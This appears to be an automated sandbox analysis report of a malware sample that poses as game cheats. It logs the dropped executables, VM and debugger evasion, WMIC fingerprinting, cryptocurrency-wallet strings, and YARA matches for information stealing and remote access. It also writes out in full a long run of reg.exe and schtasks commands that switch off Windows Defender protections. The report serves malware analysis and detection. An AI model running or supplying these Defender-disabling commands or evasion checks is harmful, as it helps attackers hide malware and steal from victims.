Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
Source: Lunch LaCheatV2.exe, 00000006.00000002.2263995910.0000000000408000.00000020.00000001.01000000.00000009.sdmp | Binary or memory string: Q|SBIEDLL.DLL
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe | RDTSC instruction interceptor: First address: 1ACE14C second address: 1ACE156 instructions: 0x00000000 rdtsc 0x00000002 sub cl, FFFFFF93h 0x00000005 not dx 0x00000008 not cl 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe | RDTSC instruction interceptor: First address: FCCA9E second address: FCCAA4 instructions: 0x00000000 rdtsc 0x00000002 bswap ebp 0x00000004 pop edi 0x00000005 lahf 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe | RDTSC instruction interceptor: First address: FA93AB second address: FA93BE instructions: 0x00000000 rdtsc 0x00000002 sub dx, 35C4h 0x00000007 xor cl, FFFFFFD9h 0x0000000a cmc 0x0000000b sub cl, 00000014h 0x0000000e bswap eax 0x00000010 cwde 0x00000011 not cl 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe | RDTSC instruction interceptor: First address: 10396D7 second address: 10396EF instructions: 0x00000000 rdtsc 0x00000002 bsf dx, bx 0x00000006 test esp, 7F476D6Bh 0x0000000c xor cl, FFFFFFA9h 0x0000000f not dh 0x00000011 xor bl, cl 0x00000013 btc eax, FFFFFFACh 0x00000017 push ebp 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe | RDTSC instruction interceptor: First address: F79280 second address: 1B3CCA7 instructions: 0x00000000 rdtsc 0x00000002 nop 0x00000003 push 04DA974Eh 0x00000008 call 00007F8F9CE7A99Fh 0x0000000d push ebx 0x0000000e not bl 0x00000010 seto bh 0x00000013 push edx 0x00000014 cwd 0x00000016 push eax 0x00000017 push esi 0x00000018 cmovnb si, bp 0x0000001c pushfd 0x0000001d cwde 0x0000001e cmovns esi, ebx 0x00000021 cdq 0x00000022 push ebp 0x00000023 xchg esi, esi 0x00000025 push ecx 0x00000026 dec cl 0x00000028 not eax 0x0000002a push edi 0x0000002b inc bl 0x0000002d mov ecx, 00000000h 0x00000032 cdq 0x00000033 cwde 0x00000034 push ecx 0x00000035 mov dx, bp 0x00000038 lahf 0x00000039 cbw 0x0000003b mov edi, dword ptr [esp+28h] 0x0000003f setns bh 0x00000042 cmovns dx, bp 0x00000046 inc esi 0x00000047 inc edi 0x00000048 ror ebp, FFFFFF84h 0x0000004b xor edi, 352C7E3Bh 0x00000051 or bp, ax 0x00000054 shld ebp, ecx, 000000DBh 0x00000058 neg edi 0x0000005a bt ebx, ebp 0x0000005d btc ax, FFDCh 0x00000062 lea edi, dword ptr [edi+32E32BBDh] 0x00000068 and bh, dl 0x0000006a shld eax, ecx, 0000003Bh 0x0000006e lea edi, dword ptr [edi+ecx] 0x00000071 jmp 00007F8F9DA92C7Ah 0x00000076 mov ebp, esp 0x00000078 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe | RDTSC instruction interceptor: First address: E98A5F second address: E98A69 instructions: 0x00000000 rdtsc 0x00000002 sub cl, FFFFFF93h 0x00000005 not dx 0x00000008 not cl 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe | RDTSC instruction interceptor: First address: E1951C second address: E19522 instructions: 0x00000000 rdtsc 0x00000002 bswap ebp 0x00000004 pop edi 0x00000005 lahf 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe | Special instruction interceptor: First address: F79280 instructions rdtsc caused by: RDTSC with Trap Flag (TF)
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe | Special instruction interceptor: First address: EF62C9 instructions rdtsc caused by: RDTSC with Trap Flag (TF)
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Memory allocated: 1BC027A0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Memory allocated: 1BC1C300000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe TID: 1408 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe TID: 1816 | Thread sleep count: 163 > 30
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe TID: 6600 | Thread sleep count: 115 > 30
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe TID: 7072 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe TID: 1812 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: wKj1CBkbos.exe, 52cheatand52rat.exe.0.drBinary or memory string: vboxtray
                            Source: 52cheatand52rat.exe.0.drBinary or memory string: vboxservice
                            Source: wKj1CBkbos.exe, 52cheatand52rat.exe.0.drBinary or memory string: qemu-ga
                            Source: wKj1CBkbos.exe, 00000000.00000003.2138916990.0000000001432000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                            Source: 52cheatand52rat.exe.0.drBinary or memory string: vmwareuser
                            Source: wKj1CBkbos.exe, 52cheatand52rat.exe.0.drBinary or memory string: vmusrvc
                            Source: 52cheatand52rat.exe.0.drBinary or memory string: vmwareservice+discordtokenprotector
                            Source: Lunch LaCheatV2.exe, 00000006.00000002.2266173953.0000000001C9F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\-
                            Source: 52cheatand52rat.exe.0.drBinary or memory string: vmsrvc
                            Source: 52cheatand52rat.exe.0.drBinary or memory string: vmtoolsd
                            Source: 52cheatand52rat.exe.0.drBinary or memory string: vmwaretray
                            Source: 52cheatand52rat.exe, 00000002.00000002.2211105110.000001BC043E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmwareservice
                            Source: 52cheatand52rat.exe, 00000002.00000002.2202108160.000001BC0264E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                            Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeSystem information queried: ModuleInformationJump to behavior
                            Source: C:\Windows\System32\wbem\WMIC.exeProcess information queried: ProcessInformationJump to behavior

                            Anti Debugging

Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe | System information queried: KernelDebuggerInformation
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe | Process queried: DebugObjectHandle
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Memory allocated: page read and write | page guard

                            HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\reg.exe | Registry value deleted: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender DisableAntiSpyware
Source: C:\Windows\SysWOW64\reg.exe | Registry value deleted: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender DisableAntiSpyware
Source: C:\Users\user\Desktop\wKj1CBkbos.exe | Process created: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe "C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe"
Source: C:\Users\user\Desktop\wKj1CBkbos.exe | Process created: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe "C:\Users\user\AppData\Local\Temp\Primordial Crack.exe"
Source: C:\Users\user\Desktop\wKj1CBkbos.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\windows defender.bat" "
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuid
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe | Process created: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe "C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe"
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\windows defender.bat" "
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Mpuser" /v "MpEnablePus" /t REG_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Mpuser" /v "MpEnablePus" /t REG_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                            Lowering of HIPS / PFW / Operating System Security Settings

Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender | Registry value created: DisableAntiSpyware 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender | Registry value created: DisableAntiVirus 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Mpuser | Registry value created: MpEnablePus 0
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | Registry value created: DisableBehaviorMonitoring 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | Registry value created: DisableIOAVProtection 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender | Registry value created: DisableAntiSpyware 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender | Registry value created: DisableAntiVirus 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | Registry value created: DisableOnAccessProtection 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Mpuser | Registry value created: MpEnablePus 0
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | Registry value created: DisableRealtimeMonitoring 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | Registry value created: DisableBehaviorMonitoring 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | Registry value created: DisableScanOnRealtimeEnable 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting | Registry value created: DisableEnhancedNotifications 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet | Registry value created: DisableBlockAtFirstSeen 1

                            Stealing of Sensitive Information

Source: Yara match | File source: wKj1CBkbos.exe, type: SAMPLE
Source: Yara match | File source: 2.0.52cheatand52rat.exe.1bc02440000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.wKj1CBkbos.exe.13e55f0.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.wKj1CBkbos.exe.40936c.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.wKj1CBkbos.exe.13e55f0.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.wKj1CBkbos.exe.13e55f0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.wKj1CBkbos.exe.40936c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000000.2138750584.000001BC02442000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2138916990.00000000013AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.2133151338.0000000000408000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: wKj1CBkbos.exe PID: 5280, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: 52cheatand52rat.exe PID: 4420, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe, type: DROPPED
Source: Yara match | File source: wKj1CBkbos.exe, type: SAMPLE
Source: Yara match | File source: 2.0.52cheatand52rat.exe.1bc02440000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.wKj1CBkbos.exe.13e55f0.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.wKj1CBkbos.exe.40936c.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.wKj1CBkbos.exe.13e55f0.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.wKj1CBkbos.exe.13e55f0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.wKj1CBkbos.exe.40936c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000000.2138750584.000001BC02442000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2138916990.00000000013AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.2133151338.0000000000408000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: wKj1CBkbos.exe PID: 5280, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: 52cheatand52rat.exe PID: 4420, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe, type: DROPPED
Source: wKj1CBkbos.exe, 00000000.00000003.2138916990.00000000013AC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Electrum
Source: wKj1CBkbos.exe, 00000000.00000003.2138916990.00000000013AC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: BytecoinJaxx!com.liberty.jaxx
Source: wKj1CBkbos.exe, 00000000.00000003.2138916990.00000000013AC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Exodus
Source: wKj1CBkbos.exe, 00000000.00000003.2138916990.00000000013AC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Ethereum
Source: wKj1CBkbos.exe, 00000000.00000003.2138916990.00000000013AC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: keystore
Source: Yara match | File source: Process Memory Space: wKj1CBkbos.exe PID: 5280, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: 52cheatand52rat.exe PID: 4420, type: MEMORYSTR

                            Remote Access Functionality

Source: Yara match | File source: wKj1CBkbos.exe, type: SAMPLE
Source: Yara match | File source: 2.0.52cheatand52rat.exe.1bc02440000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.wKj1CBkbos.exe.13e55f0.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.wKj1CBkbos.exe.40936c.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.wKj1CBkbos.exe.13e55f0.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.wKj1CBkbos.exe.13e55f0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.wKj1CBkbos.exe.40936c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000000.2138750584.000001BC02442000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2138916990.00000000013AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.2133151338.0000000000408000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: wKj1CBkbos.exe PID: 5280, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: 52cheatand52rat.exe PID: 4420, type: MEMORYSTR
